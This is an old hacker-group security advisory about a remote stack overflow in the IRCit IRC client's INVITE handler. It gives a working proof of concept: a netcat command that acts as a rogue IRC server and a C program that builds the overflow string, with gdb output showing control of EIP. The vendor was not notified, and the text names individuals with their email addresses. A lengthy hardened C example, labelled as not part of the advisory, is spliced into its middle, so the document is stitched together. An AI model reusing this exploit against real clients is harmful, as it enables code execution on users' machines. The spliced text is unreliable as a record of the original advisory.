-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES (http://www.bugtraq.org)
================================

GOBBLES Security Labs (GSL) is currently the largest non-profit security team in the world, with over 17 active members that are dedicated to bringing cutting edge material to the public that other groups are too afraid and/or selfish to do. Unlike some groups, GSL is at least honest about their intentions -- GSL members want fame and glory. We're not out to make friends (re: fat kid).

 ____________________
< GOBBLES LOVE ROUTE >
 --------------------
        \
         [ASCII-art turkey, garbled in extraction]

ABOUT THIS RELEASE
==================

This is an emergency release. Politics are involved. Comic advisory coming soon. Thank you for understanding situation.

POTENTIAL REMOTE ROOT VULNERABILITY IN IRCit IRC CLIENT (POSSIBLY MORE)
========================================================================

Everyone knows that compromising an IRC client is the first step in hacking a "secure" operating system developer's personal IRC shell server. Hence this leads to the first of few steps to gain root on such a machine.

GOBBLES Security members have found an exploitable remote vulnerability in the IRCit IRC Client, which can be downloaded from:

http://www.asymmetrica.com/software/ircit/

IRCit is very dangerous software in all respects. As it claims to be IRC client for Information Terrorists. Proceed with caution and extreme prejudice.
For details read rest of advisory hehehe ;PPppPPPP

SOFTWARE VERSIONS AFFECTED
==========================

. . . at least the Current version, turkey not going to waste he time and take look at old versions to post big long useless list of all vulnerable versions, and likewise not going to look for same bug occurring in clients and clients derived from this client, and clients derived from same client this one was derived from, this is task for Team Bugtraq (bugtraq@securityfocus.com) and for Team Vuln-Dev (vuln-dev@securityfocus.com) to do. GOBBLES not going to waste he time, when there political agenda to be taken care of in this advisory.

MISCELLANEOUS ERRATA
====================

First, it was brought to the world's attention here that monkey.org had been compromised and dugsong distributions were backdoored [1]. Then, here [2] we see doug sniff talking about how his server was compromised, and he mentions a REMOTE CLIENT SIDE HOLE in a popular IRC client Epic [3], which was used in the hack of his server (or crack, if you have too much ego to admit to being compromised by someone more skilled than yourself, as the case seems to be). We like to quote useless IETF drafts [4] and RFC's [5] in our advisories and other publications to show off that we're smart and read a lot of worthless papers, like real skilled geeks do.

After reading this, GOBBLES Security members did visit www.epicsol.org and looked for information about this dastardly remote exploit that aids in the remote root compromise of an OpenBSD developer's and self-proclaimed security expert's personal machine, and found no mention of a vulnerability, including no mention of it in the CHANGELOG [6]. Members of GOBBLES Security then tried to contact doug sniff via email [7], who ignored our inquiries concerning the bug. We then approached whitehat [8] w00w00 leader Shok [9] to see if he could share any details on this w00w00-known 0day vulnerability in one of the most popular IRC clients.
He also refused to even acknowledge us. Members of GOBBLES Security then attempted to post to mailing lists, such as bugtraq [10] and vulndev [11] concerning this quasi-known vulnerability, and were disappointed to see that all our posts on the matter were rejected.

We then proceeded to browse through our collection of DEAR DIARY notes concerning vulnerabilities that we have discovered during various audits that we have not yet had the time to write advisories for, to see if we had any information on a remote hole in Epic. It turns out, we've yet to audit that client, but plan on it in the near future. We did come across notes regarding a somewhat related hole, which was written up into this very advisory that you are now reading.

TECHNICAL DETAILS
=================

GOBBLES-bugsquasher.c find following situation with full alert red flags in IRCit serverr.c sourcecode:

...
STD_IRC_SERVER(sINVITE)
{
  char *n, *h, *v;

  if (n=splitn(&from), !from) from="*@*";
  if (v=splitw(&rest), ((rest)&&(*rest==':'))) rest++;

  if ((mt_ptr->c_ignore&IG_INVITE)==0)
  {
    char s[MAXHOSTLEN];

    FIXIT(from);
    sprintf (s, "%s!%s", n, from);
...

GOBBLES is not even going to comment on where he think problem is. Rogue IRC server that allow bad clients can allow the hijacking of IRCit information terrorist client by inviting he client to execute arbitrary code.
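The defect the snippet above points at is the unbounded sprintf of server-supplied nick and user@host into a fixed MAXHOSTLEN buffer. The following is an added example, not IRCit's code and not part of the advisory, showing the bounded way to handle the same INVITE prefix: the copy is limited with snprintf and the return value is checked, so an oversized prefix is refused instead of overrunning the stack. The MAXHOSTLEN value, the function names (split_prefix, format_invite_source, handle_invite) and the sample lines are all assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size; IRCit's real MAXHOSTLEN is not given in the advisory. */
#define MAXHOSTLEN 128

/* Split "nick!user@host" into nick and user@host. An over-long nick is
   rejected rather than silently truncated. Returns 0 on success, -1 on
   malformed or oversized input. */
static int split_prefix(const char *prefix, char *nick, size_t nicklen,
                        const char **userhost)
{
    const char *bang = strchr(prefix, '!');
    if (bang == NULL)
        return -1;
    size_t n = (size_t)(bang - prefix);
    if (n == 0 || n >= nicklen)
        return -1;
    memcpy(nick, prefix, n);
    nick[n] = '\0';
    *userhost = bang + 1;
    return 0;
}

/* Hardened counterpart of the advisory's sprintf(s, "%s!%s", n, from):
   snprintf bounds the write and the return value is checked, so input
   that would not fit is refused. Returns 1 when s holds the complete
   string, 0 otherwise (s is then empty). */
int format_invite_source(char *s, size_t slen,
                         const char *nick, const char *userhost)
{
    int needed = snprintf(s, slen, "%s!%s", nick, userhost);
    if (needed < 0 || (size_t)needed >= slen) {
        s[0] = '\0';
        return 0;
    }
    return 1;
}

/* Handle one raw line ":nick!user@host INVITE target :#chan".
   On success writes "nick!user@host" to out and returns 1; returns 0
   with out empty for malformed or oversized input. */
int handle_invite(const char *line, char *out, size_t outlen)
{
    char prefix[512];            /* RFC 1459 caps a full line at 512 bytes */
    char nick[MAXHOSTLEN];
    const char *userhost;
    const char *sp;
    size_t plen;

    if (outlen == 0)
        return 0;
    out[0] = '\0';
    if (line[0] != ':')
        return 0;
    sp = strchr(line, ' ');
    if (sp == NULL)
        return 0;
    plen = (size_t)(sp - (line + 1));
    if (plen >= sizeof prefix)
        return 0;
    memcpy(prefix, line + 1, plen);
    prefix[plen] = '\0';
    if (strncmp(sp + 1, "INVITE ", 7) != 0)
        return 0;
    if (split_prefix(prefix, nick, sizeof nick, &userhost) != 0)
        return 0;
    return format_invite_source(out, outlen, nick, userhost);
}

/* Constructed sample: an ordinary invite that fits comfortably. */
int demo_normal_invite(char *out, size_t outlen)
{
    return handle_invite(":alice!alice@example.test INVITE bob :#chan",
                         out, outlen);
}

/* Constructed sample: a 125-byte filler nick, the shape of input that
   plain sprintf would have written past a MAXHOSTLEN buffer. */
int demo_oversized_invite(char *out, size_t outlen)
{
    char line[512];
    char nick[126];
    memset(nick, 'x', sizeof nick - 1);
    nick[sizeof nick - 1] = '\0';
    snprintf(line, sizeof line, ":%s!u@h INVITE bob :#chan", nick);
    return handle_invite(line, out, outlen);
}

int main(void)
{
    char out[MAXHOSTLEN];
    int ok = demo_normal_invite(out, sizeof out);
    printf("normal:    %d -> \"%s\"\n", ok, out);
    ok = demo_oversized_invite(out, sizeof out);
    printf("oversized: %d -> \"%s\"\n", ok, out);
    return 0;
}
```

The point of checking snprintf's return value rather than just switching from sprintf: silent truncation of a hostmask can still mislead later code (ignore lists, logging), so a prefix that does not fit in the buffer is dropped outright.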
EXPLOIT
=======

To exploit GOBBLES use he #1 whitehat penetrator tool netcat:

$ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc -l -p 6667

GOBBLES cut and paste he code especially for friend Al Huger:

/* GOBBLES-invite.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
  char heh[175], *store;
  int i;

  if(argc == 1) exit(0);

  /* address given on the command line, written into the filler */
  sscanf(argv[1], "%p", &store);
  memset(heh, 'x', sizeof(heh));
  *(long *)&heh[166] = (long)store;
  *(long *)&heh[170] = (long)store;
  heh[174] = '\0';
  fprintf(stdout, "%s", heh);
  exit(0);
}

When GOBBLES connect he IRCit client he notice following in resulting coredump:

(gdb) info reg eip
eip            0xcafebabe       0xcafebabe
(gdb)

That mean GOBBLES now have remotely exploitable bug of EPIC proportions in IRCit irc client for information terrorists.

VENDOR NOTIFICATION STATUS
==========================

GOBBLES in security for fame, not friends. GOBBLES often criticized and immature method of not contacting vendor/programmer team come into play once more today, and this advisory sent out without any notification. Please divert flames from /dev/null stuff and send them to GOBBLES@hushmail.com so we all can sit in #!GOBBLES on irc looking at angry mails from critics calling us immature and stuff.

GREETZ
======

all of w00w00, all of monkey.org, friends from Summercon 2002 (When are videos going to get put online of GOBBLES speech?!!?
HURRY THIS EMERGENCY!#) including everyone whose name that GOBBLES already forget, especially nice people who buy dinner for GOBBLES, gweeds (thanks for free redbull), sl0ppy for being ethical and reading our email (hehe we love you anyway, GOBBLES still beat you in Greatest Hacks competition by one place though!!!), twd for discussing future of GOBBLES Security in relation to his ezine, and to girl who apologize profusely to naked GOBBLES for laughing at him during speech, hehehe ;PPPPpppp

Speech notes and pornography will be available online very soon from Summercon, hehe, "GOBBLES LOVE ROUTE" and stuff, right now GOBBLES working on figuring out hosting issue to thwart wget-based ddos he website already experience (advisory coming soon on this subject). Double standards rule.

CLOSING
=======

Anyone who has pictures from Summercon 2002, please mail them to us (GOBBLES@hushmail.com), thanks!

Remember, full disclosure is good, especially if political vendetta can be aired to the public in a w00w00 style hidden in such subtle manner as within security advisory. If you could provide the community with details concerning this so-called "Remote Root" hole in Epic, please do not hesitate to do so! Teasing the academic/professional security community with rumors of exploits is not an appropriate action for anyone who wants to call themselves a whitehat!
[1] http://archives.neohapsis.com/archives/bugtraq/2002-05/0281.html
[2] http://archives.neohapsis.com/archives/bugtraq/2002-05/0285.html
[3] http://www.epicsol.org
[4] http://www.ietf.org/ids.by.wg/webdav.html
[5] http://www.rfc-editor.org/cgi-bin/rfcdoctype.pl?loc=RFC&letsgo=1459&type=ftp&file_format=txt
[6] http://www.epicsol.org/changelog.phtml
[7] dugsong@monkey.org (doug sniff)
[8] http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0672.html
[9] shok@dataforce.net (Matt Conover)
[10] http://archives.neohapsis.com/archives/vuln-dev/
[11] http://archives.neohapsis.com/archives/bugtraq/

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj0HaMAVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP9+4A
n3XI0qqEJoZURxozpAhF6uBQenmoAJ9D1bXamS844pgNzwSUM7wKIn7/1Q==
=5s6i
-----END PGP SIGNATURE-----